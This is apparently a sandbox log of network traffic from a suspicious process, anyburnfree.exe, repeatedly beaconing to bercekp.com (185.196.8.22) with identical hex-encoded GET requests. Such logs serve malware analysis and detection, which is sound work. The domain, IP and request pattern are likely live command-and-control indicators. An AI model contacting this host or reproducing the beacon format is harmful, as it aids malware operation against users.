                                                                                                                                                                    Feb 8, 2024 19:10:14.171756029 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:14.408251047 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:14 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    53192.168.2.349802185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:15.373063087 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:15.609611988 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:15 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    54192.168.2.349803185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:16.046927929 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:16.283880949 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:16 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    55192.168.2.349804185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:16.765247107 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:17.001852036 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:16 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    56192.168.2.349805185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:17.424519062 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:17.661334991 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:17 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    57192.168.2.349806185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:18.119215012 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:18.356194019 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:18 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    58192.168.2.349807185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:18.735331059 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:18.972156048 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:18 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    59192.168.2.349808185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:19.720705032 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:19.957314968 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:19 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    60192.168.2.349809185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:20.528003931 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:20.764875889 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:20 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    61192.168.2.349810185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:21.340918064 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:21.577475071 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:21 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    62192.168.2.349811185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:21.999969006 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:22.237138987 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:22 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    63192.168.2.349812185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:22.704471111 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:22.941186905 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:22 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    64192.168.2.349813185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:23.590698957 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:23.827008963 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:23 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    65192.168.2.349814185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:24.268155098 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:24.504287958 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:24 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    66192.168.2.349815185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:24.920856953 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:25.157814980 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:25 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    67192.168.2.349816185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:25.691627979 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:25.928129911 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:25 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    68192.168.2.349817185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:26.360809088 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:26.597486973 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:26 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    69192.168.2.349818185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:27.070621967 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:27.307745934 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:27 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    70192.168.2.349819185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:27.769292116 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:28.005727053 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:27 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    71192.168.2.349820185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:28.531593084 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:28.768591881 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:28 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    72192.168.2.349823185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:29.140276909 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                    Feb 8, 2024 19:10:29.377583981 CET220INHTTP/1.1 200 OK
                                                                                                                                                                    Server: nginx/1.20.1
                                                                                                                                                                    Date: Thu, 08 Feb 2024 18:10:29 GMT
                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                    X-Powered-By: PHP/7.4.33
                                                                                                                                                                    Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                    Data Ascii: e67b680813008c20


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    73192.168.2.349824185.196.8.22802324C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    Feb 8, 2024 19:10:29.914278030 CET318OUTGET /search/?q=67e28dd83e5df421160afd1c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef815c1ea929332 HTTP/1.1
                                                                                                                                                                    Host: bercekp.com
